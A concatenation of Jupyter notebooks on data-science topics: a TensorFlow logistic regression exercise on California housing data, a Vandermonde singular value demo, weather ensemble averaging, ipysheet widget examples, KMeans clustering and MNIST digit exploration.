A DataFrame that contains the features to be used for the model, including
synthetic features.
"""
selected_features = california_housing_dataframe[
["latitude",
"longitude",
"housing_median_age",
"total_rooms",
"total_bedrooms",
"population",
"households",
"median_income"]]
processed_features = selected_features.copy()
# Create a synthetic feature.
processed_features["rooms_per_person"] = (
california_housing_dataframe["total_rooms"] /
california_housing_dataframe["population"])
return processed_features
def preprocess_targets(california_housing_dataframe):
"""Prepares target features (i.e., labels) from California housing data set.
Args:
california_housing_dataframe: A Pandas DataFrame expected to contain data
from the California housing data set.
Returns:
A DataFrame that contains the target feature.
"""
output_targets = pd.DataFrame()
# Create a boolean categorical feature representing whether the
# median_house_value is above a set threshold.
output_targets["median_house_value_is_high"] = (
california_housing_dataframe["median_house_value"] > 265000).astype(float)
return output_targets
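A minimal sketch of the thresholding step above, on a tiny hypothetical frame: values strictly greater than the cutoff map to `1.0`, everything else (including the cutoff itself) to `0.0`.

```python
import pandas as pd

demo = pd.DataFrame({"median_house_value": [100000.0, 265000.0, 400000.0]})
# Boolean comparison, then cast to float labels for the model.
labels = (demo["median_house_value"] > 265000).astype(float)
print(labels.tolist())  # [0.0, 0.0, 1.0]
```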
# + colab={} colab_type="code" id="FwOYWmXqWA6D"
# Choose the first 12000 (out of 17000) examples for training.
training_examples = preprocess_features(california_housing_dataframe.head(12000))
training_targets = preprocess_targets(california_housing_dataframe.head(12000))
# Choose the last 5000 (out of 17000) examples for validation.
validation_examples = preprocess_features(california_housing_dataframe.tail(5000))
validation_targets = preprocess_targets(california_housing_dataframe.tail(5000))
# Double-check that we've done the right thing.
print("Training examples summary:")
display.display(training_examples.describe())
print("Validation examples summary:")
display.display(validation_examples.describe())
print("Training targets summary:")
display.display(training_targets.describe())
print("Validation targets summary:")
display.display(validation_targets.describe())
# + [markdown] colab_type="text" id="uon1LB3A31VN"
# ## How would linear regression fare?
# To see why logistic regression is effective, let's first train a naive model that uses linear regression. This model will use labels with values in the set `{0, 1}`, and will try to predict a continuous value that is as close as possible to `0` or `1`. Furthermore, since we wish to interpret the output as a probability, it would be ideal if the output falls within the range `(0, 1)`. We would then apply a threshold of `0.5` to determine the label.
#
# Run the cells below to train the linear regression model using [LinearRegressor](https://www.tensorflow.org/api_docs/python/tf/estimator/LinearRegressor).
# + colab={} colab_type="code" id="smmUYRDtWOV_"
def construct_feature_columns(input_features):
"""Construct the TensorFlow Feature Columns.
Args:
input_features: The names of the numerical input features to use.
Returns:
A set of feature columns
"""
return set([tf.feature_column.numeric_column(my_feature)
for my_feature in input_features])
# + colab={} colab_type="code" id="B5OwSrr1yIKD"
def my_input_fn(features, targets, batch_size=1, shuffle=True, num_epochs=None):
"""Trains a linear regression model.
Args:
features: pandas DataFrame of features
targets: pandas DataFrame of targets
batch_size: Size of batches to be passed to the model
shuffle: True or False. Whether to shuffle the data.
num_epochs: Number of epochs for which data should be repeated. None = repeat indefinitely
Returns:
Tuple of (features, labels) for next data batch
"""
# Convert pandas data into a dict of np arrays.
features = {key:np.array(value) for key,value in dict(features).items()}
# Construct a dataset, and configure batching/repeating.
ds = Dataset.from_tensor_slices((features,targets)) # warning: 2GB limit
ds = ds.batch(batch_size).repeat(num_epochs)
# Shuffle the data, if specified.
if shuffle:
ds = ds.shuffle(10000)
# Return the next batch of data.
features, labels = ds.make_one_shot_iterator().get_next()
return features, labels
# + colab={} colab_type="code" id="SE2-hq8PIYHz"
def train_linear_regressor_model(
learning_rate,
steps,
batch_size,
training_examples,
training_targets,
validation_examples,
validation_targets):
"""Trains a linear regression model.
In addition to training, this function also prints training progress information,
as well as a plot of the training and validation loss over time.
Args:
learning_rate: A `float`, the learning rate.
steps: A non-zero `int`, the total number of training steps. A training step
consists of a forward and backward pass using a single batch.
batch_size: A non-zero `int`, the batch size.
training_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for training.
training_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for training.
validation_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for validation.
validation_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for validation.
Returns:
A `LinearRegressor` object trained on the training data.
"""
periods = 10
steps_per_period = steps / periods
# Create a linear regressor object.
my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)
linear_regressor = tf.estimator.LinearRegressor(
feature_columns=construct_feature_columns(training_examples),
optimizer=my_optimizer
)
# Create input functions.
training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
batch_size=batch_size)
predict_training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
predict_validation_input_fn = lambda: my_input_fn(validation_examples,
validation_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
# Train the model, but do so inside a loop so that we can periodically assess
# loss metrics.
print("Training model...")
print("RMSE (on training data):")
training_rmse = []
validation_rmse = []
for period in range (0, periods):
# Train the model, starting from the prior state.
linear_regressor.train(
input_fn=training_input_fn,
steps=steps_per_period
)
# Take a break and compute predictions.
training_predictions = linear_regressor.predict(input_fn=predict_training_input_fn)
training_predictions = np.array([item['predictions'][0] for item in training_predictions])
validation_predictions = linear_regressor.predict(input_fn=predict_validation_input_fn)
validation_predictions = np.array([item['predictions'][0] for item in validation_predictions])
# Compute training and validation loss.
training_root_mean_squared_error = math.sqrt(
metrics.mean_squared_error(training_predictions, training_targets))
validation_root_mean_squared_error = math.sqrt(
metrics.mean_squared_error(validation_predictions, validation_targets))
# Occasionally print the current loss.
print(" period %02d : %0.2f" % (period, training_root_mean_squared_error))
# Add the loss metrics from this period to our list.
training_rmse.append(training_root_mean_squared_error)
validation_rmse.append(validation_root_mean_squared_error)
print("Model training finished.")
# Output a graph of loss metrics over periods.
plt.ylabel("RMSE")
plt.xlabel("Periods")
plt.title("Root Mean Squared Error vs. Periods")
plt.tight_layout()
plt.plot(training_rmse, label="training")
plt.plot(validation_rmse, label="validation")
plt.legend()
return linear_regressor
# + colab={} colab_type="code" id="TDBD8xeeIYH2"
linear_regressor = train_linear_regressor_model(
learning_rate=0.000001,
steps=200,
batch_size=20,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
# + [markdown] colab_type="text" id="JjBZ_q7aD9gh"
# ## Task 1: Can we calculate LogLoss for these predictions?
#
# **Examine the predictions and decide whether or not we can use them to calculate LogLoss.**
#
# `LinearRegressor` uses the L2 loss, which doesn't do a great job of penalizing misclassifications when the output is interpreted as a probability. For example, there should be a huge difference between whether a negative example is classified as positive with a probability of 0.9 vs. 0.9999, but L2 loss doesn't strongly differentiate these cases.
#
# In contrast, `LogLoss` penalizes these "confidence errors" much more heavily. Remember, `LogLoss` is defined as:
#
# $$Log Loss = \sum_{(x,y)\in D} -y \cdot log(y_{pred}) - (1 - y) \cdot log(1 - y_{pred})$$
#
#
# But first, we need to obtain the prediction values. We can use `LinearRegressor.predict` to obtain them.
#
# Can we use the predictions and the corresponding targets to calculate `LogLoss`?
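The LogLoss formula above can be transcribed directly into NumPy. Note the formula is written as a sum over $D$, while sklearn's `metrics.log_loss` reports the mean over examples; this sketch averages as well so the two agree.

```python
import numpy as np

def log_loss(y_true, y_pred, eps=1e-15):
    # Clip predictions away from 0 and 1 to guard against log(0).
    y_pred = np.clip(y_pred, eps, 1 - eps)
    return np.mean(-y_true * np.log(y_pred) - (1 - y_true) * np.log(1 - y_pred))

y = np.array([1.0, 0.0, 1.0])
p = np.array([0.9, 0.1, 0.8])
print(log_loss(y, p))  # ~0.1446: small, since all three predictions are confident and correct
```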
# + [markdown] colab_type="text" id="dPpJUV862FYI"
# ### Solution
#
# Click below for the solution.
# + colab={} colab_type="code" id="kXFQ5uig2RoP"
predict_validation_input_fn = lambda: my_input_fn(validation_examples,
validation_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
validation_predictions = linear_regressor.predict(input_fn=predict_validation_input_fn)
validation_predictions = np.array([item['predictions'][0] for item in validation_predictions])
_ = plt.hist(validation_predictions)
# + [markdown] colab_type="text" id="rYpy336F9wBg"
# ## Task 2: Train a logistic regression model and calculate LogLoss on the validation set
#
# To use logistic regression, simply replace `LinearRegressor` with [LinearClassifier](https://www.tensorflow.org/api_docs/python/tf/estimator/LinearClassifier). Complete the code below.
#
# **NOTE**: When running `train()` and `predict()` on a `LinearClassifier` model, you can access the real-valued predicted probabilities via the `"probabilities"` key of the returned dict, e.g. `predictions["probabilities"]`. Sklearn's [log_loss](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.log_loss.html) function is handy for calculating LogLoss using these probabilities.
#
# + colab={} colab_type="code" id="JElcb--E9wBm"
def train_linear_classifier_model(
learning_rate,
steps,
batch_size,
training_examples,
training_targets,
validation_examples,
validation_targets):
"""Trains a linear classification model.
In addition to training, this function also prints training progress information,
as well as a plot of the training and validation loss over time.
Args:
learning_rate: A `float`, the learning rate.
steps: A non-zero `int`, the total number of training steps. A training step
consists of a forward and backward pass using a single batch.
batch_size: A non-zero `int`, the batch size.
training_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for training.
training_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for training.
validation_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for validation.
validation_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for validation.
Returns:
A `LinearClassifier` object trained on the training data.
"""
periods = 10
steps_per_period = steps / periods
# Create a linear classifier object.
my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)
linear_classifier = # YOUR CODE HERE: Construct the linear classifier.
# Create input functions.
training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
batch_size=batch_size)
predict_training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
predict_validation_input_fn = lambda: my_input_fn(validation_examples,
validation_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
# Train the model, but do so inside a loop so that we can periodically assess
# loss metrics.
print("Training model...")
print("LogLoss (on training data):")
training_log_losses = []
validation_log_losses = []
for period in range (0, periods):
# Train the model, starting from the prior state.
linear_classifier.train(
input_fn=training_input_fn,
steps=steps_per_period
)
# Take a break and compute predictions.
training_probabilities = linear_classifier.predict(input_fn=predict_training_input_fn)
training_probabilities = np.array([item['probabilities'] for item in training_probabilities])
validation_probabilities = linear_classifier.predict(input_fn=predict_validation_input_fn)
validation_probabilities = np.array([item['probabilities'] for item in validation_probabilities])
training_log_loss = metrics.log_loss(training_targets, training_probabilities)
validation_log_loss = metrics.log_loss(validation_targets, validation_probabilities)
# Occasionally print the current loss.
print(" period %02d : %0.2f" % (period, training_log_loss))
# Add the loss metrics from this period to our list.
training_log_losses.append(training_log_loss)
validation_log_losses.append(validation_log_loss)
print("Model training finished.")
# Output a graph of loss metrics over periods.
plt.ylabel("LogLoss")
plt.xlabel("Periods")
plt.title("LogLoss vs. Periods")
plt.tight_layout()
plt.plot(training_log_losses, label="training")
plt.plot(validation_log_losses, label="validation")
plt.legend()
return linear_classifier
# + colab={} colab_type="code" id="VM0wmnFUIYH9"
linear_classifier = train_linear_classifier_model(
learning_rate=0.000005,
steps=500,
batch_size=20,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
# + [markdown] colab_type="text" id="i2e3TlyL57Qs"
# ### Solution
#
# Click below for the solution.
#
#
# + colab={} colab_type="code" id="5YxXd2hn6MuF"
def train_linear_classifier_model(
learning_rate,
steps,
batch_size,
training_examples,
training_targets,
validation_examples,
validation_targets):
"""Trains a linear classification model.
In addition to training, this function also prints training progress information,
as well as a plot of the training and validation loss over time.
Args:
learning_rate: A `float`, the learning rate.
steps: A non-zero `int`, the total number of training steps. A training step
consists of a forward and backward pass using a single batch.
batch_size: A non-zero `int`, the batch size.
training_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for training.
training_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for training.
validation_examples: A `DataFrame` containing one or more columns from
`california_housing_dataframe` to use as input features for validation.
validation_targets: A `DataFrame` containing exactly one column from
`california_housing_dataframe` to use as target for validation.
Returns:
A `LinearClassifier` object trained on the training data.
"""
periods = 10
steps_per_period = steps / periods
# Create a linear classifier object.
my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)
linear_classifier = tf.estimator.LinearClassifier(
feature_columns=construct_feature_columns(training_examples),
optimizer=my_optimizer
)
# Create input functions.
training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
batch_size=batch_size)
predict_training_input_fn = lambda: my_input_fn(training_examples,
training_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
predict_validation_input_fn = lambda: my_input_fn(validation_examples,
validation_targets["median_house_value_is_high"],
num_epochs=1,
shuffle=False)
# Train the model, but do so inside a loop so that we can periodically assess
# loss metrics.
print("Training model...")
print("LogLoss (on training data):")
training_log_losses = []
validation_log_losses = []
for period in range(0, periods):
# Train the model, starting from the prior state.
linear_classifier.train(
input_fn=training_input_fn,
steps=steps_per_period
)
# Take a break and compute predictions.
training_probabilities = linear_classifier.predict(input_fn=predict_training_input_fn)
training_probabilities = np.array([item['probabilities'] for item in training_probabilities])
validation_probabilities = linear_classifier.predict(input_fn=predict_validation_input_fn)
validation_probabilities = np.array([item['probabilities'] for item in validation_probabilities])
training_log_loss = metrics.log_loss(training_targets, training_probabilities)
validation_log_loss = metrics.log_loss(validation_targets, validation_probabilities)
# Occasionally print the current loss.
print(" period %02d : %0.2f" % (period, training_log_loss))
# Add the loss metrics from this period to our list.
training_log_losses.append(training_log_loss)
validation_log_losses.append(validation_log_loss)
print("Model training finished.")
# Output a graph of loss metrics over periods.
plt.ylabel("LogLoss")
plt.xlabel("Periods")
plt.title("LogLoss vs. Periods")
plt.tight_layout()
plt.plot(training_log_losses, label="training")
plt.plot(validation_log_losses, label="validation")
plt.legend()
return linear_classifier
# + colab={} colab_type="code" id="UPM_T1FXsTaL"
linear_classifier = train_linear_classifier_model(
learning_rate=0.000005,
steps=500,
batch_size=20,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
# + [markdown] colab_type="text" id="i-Xo83_aR6s_"
# ## Task 3: Calculate Accuracy and Plot a ROC Curve for the Validation Set
#
# A few of the metrics useful for classification are the model [accuracy](https://en.wikipedia.org/wiki/Accuracy_and_precision#In_binary_classification), the [ROC curve](https://en.wikipedia.org/wiki/Receiver_operating_characteristic) and the area under the ROC curve (AUC). We'll examine these metrics.
#
# `LinearClassifier.evaluate` calculates useful metrics like accuracy and AUC.
# + colab={} colab_type="code" id="DKSQ87VVIYIA"
evaluation_metrics = linear_classifier.evaluate(input_fn=predict_validation_input_fn)
print("AUC on the validation set: %0.2f" % evaluation_metrics['auc'])
print("Accuracy on the validation set: %0.2f" % evaluation_metrics['accuracy'])
# + [markdown] colab_type="text" id="47xGS2uNIYIE"
# You may use class probabilities, such as those calculated by `LinearClassifier.predict`,
# and Sklearn's [roc_curve](http://scikit-learn.org/stable/modules/model_evaluation.html#roc-metrics) to obtain the true positive and false positive rates needed for plotting a ROC curve.
# + colab={} colab_type="code" id="xaU7ttj8IYIF"
validation_probabilities = linear_classifier.predict(input_fn=predict_validation_input_fn)
# Get just the probabilities for the positive class.
validation_probabilities = np.array([item['probabilities'][1] for item in validation_probabilities])
false_positive_rate, true_positive_rate, thresholds = metrics.roc_curve(
validation_targets, validation_probabilities)
plt.plot(false_positive_rate, true_positive_rate, label="our model")
plt.plot([0, 1], [0, 1], label="random classifier")
_ = plt.legend(loc=2)
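# The TPR/FPR values returned by `roc_curve` can be sanity-checked on a toy example (the labels and scores below are invented for illustration; only sklearn and numpy are used):

```python
import numpy as np
from sklearn import metrics

# Hypothetical ground-truth labels and positive-class probabilities.
toy_targets = np.array([0, 0, 1, 1])
toy_probabilities = np.array([0.1, 0.4, 0.35, 0.8])

fpr, tpr, thresholds = metrics.roc_curve(toy_targets, toy_probabilities)
auc = metrics.roc_auc_score(toy_targets, toy_probabilities)

# 3 of the 4 positive/negative pairs are ranked correctly, so AUC = 0.75.
print(fpr, tpr, auc)
```

# Substituting the validation targets and probabilities for the toy arrays reproduces the curve plotted above.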
# + [markdown] colab_type="text" id="PIdhwfgzIYII"
# **See if you can tune the learning settings of the model trained at Task 2 to improve AUC.**
#
# Often, certain metrics improve at the detriment of others, and you'll need to find the settings that achieve a good compromise.
#
# **Verify if all metrics improve at the same time.**
# + colab={} colab_type="code" id="XKIqjsqcCaxO"
# TUNE THE SETTINGS BELOW TO IMPROVE AUC
linear_classifier = train_linear_classifier_model(
learning_rate=0.000005,
steps=500,
batch_size=20,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
evaluation_metrics = linear_classifier.evaluate(input_fn=predict_validation_input_fn)
print("AUC on the validation set: %0.2f" % evaluation_metrics['auc'])
print("Accuracy on the validation set: %0.2f" % evaluation_metrics['accuracy'])
# + [markdown] colab_type="text" id="wCugvl0JdWYL"
# ### Solution
#
# Click below for a possible solution.
# + [markdown] colab_type="text" id="VHosS1g2aetf"
# One possible solution that works is to just train for longer, as long as we don't overfit.
#
# We can do this by increasing the number of steps, the batch size, or both.
#
# All metrics improve at the same time, so our loss metric is a good proxy for both AUC and accuracy.
#
# Notice how it takes many, many more iterations just to squeeze a few more units of AUC. This commonly happens, but often even this small gain is worth the cost.
# + colab={} colab_type="code" id="dWgTEYMddaA-"
linear_classifier = train_linear_classifier_model(
learning_rate=0.000003,
steps=20000,
batch_size=500,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets)
evaluation_metrics = linear_classifier.evaluate(input_fn=predict_validation_input_fn)
print("AUC on the validation set: %0.2f" % evaluation_metrics['auc'])
print("Accuracy on the validation set: %0.2f" % evaluation_metrics['accuracy'])
| Google-MLCC-Exercises/mlcc-exercises-ipynb-files_cn/10_logistic_regression.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import matplotlib.pyplot as plt
np.set_printoptions(suppress=True)
x = np.linspace(1, 4, 4)
print(x)
V = np.vander(x)
print(V)
# -
tol = None
r = []
max_size = 30
for i in range(max_size):
x = np.linspace(1,i+2,i+2)
V = np.vander(x)
r.append(np.linalg.matrix_rank(V, tol=tol))
u,s,vt = np.linalg.svd(V)
print(s)
plt.plot(np.linspace(0, len(s), len(s)), s)
#plt.hist(s, len(s))
plt.show()
plt.plot(range(2, max_size + 2), r)
plt.xlabel('Matrix size')
plt.ylabel('Rank')
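# The rank plateau seen above is a tolerance effect: the smallest singular values of the Vandermonde matrix decay so quickly that `matrix_rank` discards them. A minimal sketch of the underlying conditioning (numpy only; the sizes chosen are arbitrary):

```python
import numpy as np

# The condition number (sigma_max / sigma_min) of the Vandermonde matrix
# grows rapidly with size, so the smallest singular values eventually
# fall below the tolerance used by matrix_rank.
conds = []
for n in (4, 8, 12):
    V = np.vander(np.linspace(1, n, n))
    conds.append(np.linalg.cond(V))
print(conds)
```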
| src/notebooks/02/Valores singulares decrescente.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import glob
import pandas as pd
# Collect all member forecast CSV files matching the pattern
files = glob.glob('seq2seq*')
dfs=[]
for f in files:
print(f)
dfs.append(pd.read_csv(f))
# Build an empty ensemble frame with the same columns as the member forecasts.
df_ensemble = pd.DataFrame(columns=dfs[0].columns)
df_ensemble.FORE_data = dfs[0].FORE_data
df_ensemble[[' t2m', ' rh2m', ' w10m']] = 0
for i in range(len(dfs)):
df_ensemble[[' t2m', ' rh2m', ' w10m']] += dfs[i][[' t2m', ' rh2m', ' w10m']].values
df_ensemble[[' t2m', ' rh2m', ' w10m']] = df_ensemble[[' t2m', ' rh2m', ' w10m']].values / len(dfs)
df_ensemble.to_csv('./ensemble_avg_2018101503.csv', index=False)
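# The averaging step can be checked on toy frames (the column names mirror the real CSVs; the values are invented for illustration):

```python
import pandas as pd

# Two hypothetical member forecasts with the same layout as the real files.
m1 = pd.DataFrame({'FORE_data': ['a', 'b'], ' t2m': [10.0, 20.0]})
m2 = pd.DataFrame({'FORE_data': ['a', 'b'], ' t2m': [30.0, 40.0]})
members = [m1, m2]

# Element-wise mean across the member forecasts.
ensemble = members[0].copy()
ensemble[' t2m'] = sum(m[' t2m'].values for m in members) / len(members)
print(ensemble[' t2m'].tolist())
```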
| src/weather_forecasting2018_eval/ensemble_2018101503/.ipynb_checkpoints/ensemble-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.7.4
# language: python
# name: python-374
# ---
# # `ipysheet`
#
# [ipysheet](https://github.com/QuantStack/ipysheet) connects ipywidgets with tabular data. It basically adds two widgets: a _Cell widget_ and a _Sheet widget_. There are also auxiliary functions for creating table rows and columns as well as for formatting and designing cells.
# ## Installation
#
# `ipysheet` can be easily installed with Pipenv:
#
# ```
# $ pipenv install ipysheet
# ```
# ## Import
import ipysheet
# ## Cell formatting
# +
sheet1 = ipysheet.sheet()
cell0 = ipysheet.cell(0, 0, 0, numeric_format='0.0', type='numeric')
cell1 = ipysheet.cell(1, 0, "Hello", type='text')
cell2 = ipysheet.cell(0, 1, 0.1, numeric_format='0.000', type='numeric')
cell3 = ipysheet.cell(1, 1, 15.9, numeric_format='0.00', type='numeric')
cell4 = ipysheet.cell(2, 2, "14-02-2019", date_format='DD-MM-YYYY', type='date')
sheet1
# -
# ## Examples
# ### Interactive table
# +
from ipywidgets import FloatSlider, IntSlider, Image
slider = FloatSlider()
sheet2 = ipysheet.sheet()
cell1 = ipysheet.cell(0, 0, slider, style={'min-width': '122px'})
cell3 = ipysheet.cell(1, 0, 42., numeric_format='0.00')
cell_sum = ipysheet.cell(2, 0, 42., numeric_format='0.00')
@ipysheet.calculation(inputs=[(cell1, 'value'), cell3], output=cell_sum)
def calculate(a, b):
return a + b
sheet2
# -
# ### Numpy
# +
import numpy as np
from ipysheet import from_array, to_array
arr = np.random.randn(6, 10)
sheet = from_array(arr)
sheet
# +
arr = np.array([True, False, True])
sheet = from_array(arr)
sheet
# -
to_array(sheet)
# ### Table search
# +
import numpy as np
import pandas as pd
from ipysheet import from_dataframe
from ipywidgets import Text, VBox, link
df = pd.DataFrame({'A': 1.,
'B': pd.Timestamp('20130102'),
'C': pd.Series(1, index=list(range(4)), dtype='float32'),
'D': np.array([False, True, False, False], dtype='bool'),
'E': pd.Categorical(["test", "train", "test", "train"]),
'F': 'foo'})
df.loc[[0, 2], ['B']] = np.nan
s = from_dataframe(df)
search_box = Text(description='Search:')
link((search_box, 'value'), (s, 'search_token'))
VBox((search_box, s))
# -
# ### Plot editable tables
# +
import numpy as np
from traitlets import link
from ipywidgets import HBox
import bqplot.pyplot as plt
from ipysheet import sheet, cell, column
size = 18
scale = 100.
np.random.seed(0)
x_data = np.arange(size)
y_data = np.cumsum(np.random.randn(size) * scale)
fig = plt.figure()
axes_options = {'x': {'label': 'Date', 'tick_format': '%m/%d'},
'y': {'label': 'Price', 'tick_format': '0.0f'}}
scatt = plt.scatter(x_data, y_data, colors=['red'], stroke='black')
fig.layout.width = '70%'
sheet1 = sheet(rows=size, columns=2)
x_column = column(0, x_data)
y_column = column(1, y_data)
link((scatt, 'x'), (x_column, 'value'))
link((scatt, 'y'), (y_column, 'value'))
HBox((sheet1, fig))
# -
# ## For further reading
#
# * [Interactive spreadsheets in Jupyter](https://towardsdatascience.com/interactive-spreadsheets-in-jupyter-32ab6ec0f4ff)
# * [GitHub](https://github.com/QuantStack/ipysheet)
# * [Docs](https://ipysheet.readthedocs.io/en/latest/)
#
| docs/workspace/jupyter/ipywidgets/libs/ipysheet.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import numpy as np
# +
trainingdata = np.random.rand(200,2)
X = np.array(trainingdata)
# -
kmeans = KMeans(n_clusters=8, random_state=0)
kmeans.fit(X)
print(kmeans.labels_)
print(kmeans.inertia_)
testdata = np.random.rand(20,2)
print(testdata)
kmeans.predict(np.array(testdata))
centers = kmeans.cluster_centers_
# +
plt.scatter(trainingdata[:,0],trainingdata[:,1] ,c ='g' , s = 8)
plt.scatter(testdata[:,0],testdata[:,1] ,c ='b' , s = 25)
for j in range(len(centers)):
plt.scatter(centers[j,0],centers[j,1] ,c ='r' , s = 100)
plt.show()
# -
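# One common way to choose `n_clusters` is the "elbow" heuristic: refit for several values of `k` and watch `inertia_` (the within-cluster sum of squares) fall. A sketch on the same kind of random data:

```python
import numpy as np
from sklearn.cluster import KMeans

points = np.random.rand(200, 2)
inertias = []
for k in range(1, 9):
    km = KMeans(n_clusters=k, random_state=0, n_init=10).fit(points)
    inertias.append(km.inertia_)

# Inertia shrinks as k grows; the bend ("elbow") suggests a good k.
print(inertias)
```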
| Sklearn/KMeans/2.6.1.3 KMeans.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/vadManuel/Machine-Learning-UCF/blob/master/Homework/hw1/mvasquez_part3.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="rt44vyY1xW9b" colab_type="text"
# # MNIST digits data set
# + [markdown] id="l34GNy7tyNks" colab_type="text"
# ## Loading the MNIST digits data set
# + id="FSJyddqGexl5" colab_type="code" outputId="9398cffb-00f2-4155-9055-b2b3a16360c1" colab={"base_uri": "https://localhost:8080/", "height": 34}
from keras.datasets import mnist
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
# + [markdown] id="XuWVQX3CySIC" colab_type="text"
# ## Exploring the format of the MNIST digits data set
# + id="HKyztEf4fkBg" colab_type="code" outputId="2fa81e79-4d14-4f85-a81c-22d8d88a954b" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_images.shape
# + id="vA81OpzFyjyS" colab_type="code" outputId="b30d9102-3c10-4a38-c88f-c1db2cd1d57f" colab={"base_uri": "https://localhost:8080/", "height": 34}
len(train_images)
# + id="w85BC1AXxwds" colab_type="code" outputId="8a8e0a39-012f-41e2-feea-04cdee2c6a14" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_images.ndim
# + id="1sHFiZBFxnrB" colab_type="code" outputId="b8e515f8-9d9b-4a0a-cd93-290b4d975d64" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_images.dtype
# + id="euQWeEkpyCL5" colab_type="code" outputId="482b5f11-6bcc-47ea-e116-a72d26bfb7a6" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_labels
# + id="GfGCvZkGKYci" colab_type="code" outputId="825178b5-2345-45f5-db55-db2b24b51fb9" colab={"base_uri": "https://localhost:8080/", "height": 34}
train_labels.shape
# + id="jqv0aUL-gGU_" colab_type="code" outputId="38d63c81-9dcc-4398-f3ce-b0e598a5b54f" colab={"base_uri": "https://localhost:8080/", "height": 34}
len(train_labels)
# + [markdown] id="dmQ2siA7ywPx" colab_type="text"
# ## Displaying MNIST digits
# + id="uSj4HIhWzBxl" colab_type="code" colab={}
import matplotlib.pyplot as plt
# %matplotlib inline
# + id="1Gdt3obzgQaY" colab_type="code" colab={}
digit_0 = train_images[0]
# + id="SQYWiIzigabf" colab_type="code" outputId="fc5618e3-8456-4de2-bc63-b00ed166265b" colab={"base_uri": "https://localhost:8080/", "height": 34}
digit_0.shape
# + id="02FA0zxcghOn" colab_type="code" outputId="410ebfd2-552f-4691-cd9d-d0e983bf62bc" colab={"base_uri": "https://localhost:8080/", "height": 269}
plt.figure(figsize=(4, 4))
plt.imshow(digit_0)
plt.show()
# + id="JuJltxVtgnq3" colab_type="code" outputId="8e5bbe9b-93fd-46e5-e560-43e2ce322f56" colab={"base_uri": "https://localhost:8080/", "height": 34}
label_0 = train_labels[0]
label_0
# + id="NpGZCtmMicTo" colab_type="code" outputId="5693bcd8-6931-4742-db54-d603539a1309" colab={"base_uri": "https://localhost:8080/", "height": 269}
plt.figure(figsize=(4, 4))
digit_1 = train_images[1]
plt.imshow(digit_1)
plt.show()
# + id="iYfl6wW9zltQ" colab_type="code" outputId="be7b4f10-60a4-4af3-9fe6-7172953c7612" colab={"base_uri": "https://localhost:8080/", "height": 34}
label_1 = train_labels[1]
label_1
# + id="yuNo1wPOkoqi" colab_type="code" colab={}
import numpy as np
# + id="UB7_xf0hzsPx" colab_type="code" colab={}
avg = [np.zeros((28,28)) for _ in range(10)]
count = np.zeros((10))
for i, label in enumerate(train_labels):
avg[label] += train_images[i]
count[label] += 1
for i in range(10):
avg[i] /= count[i]
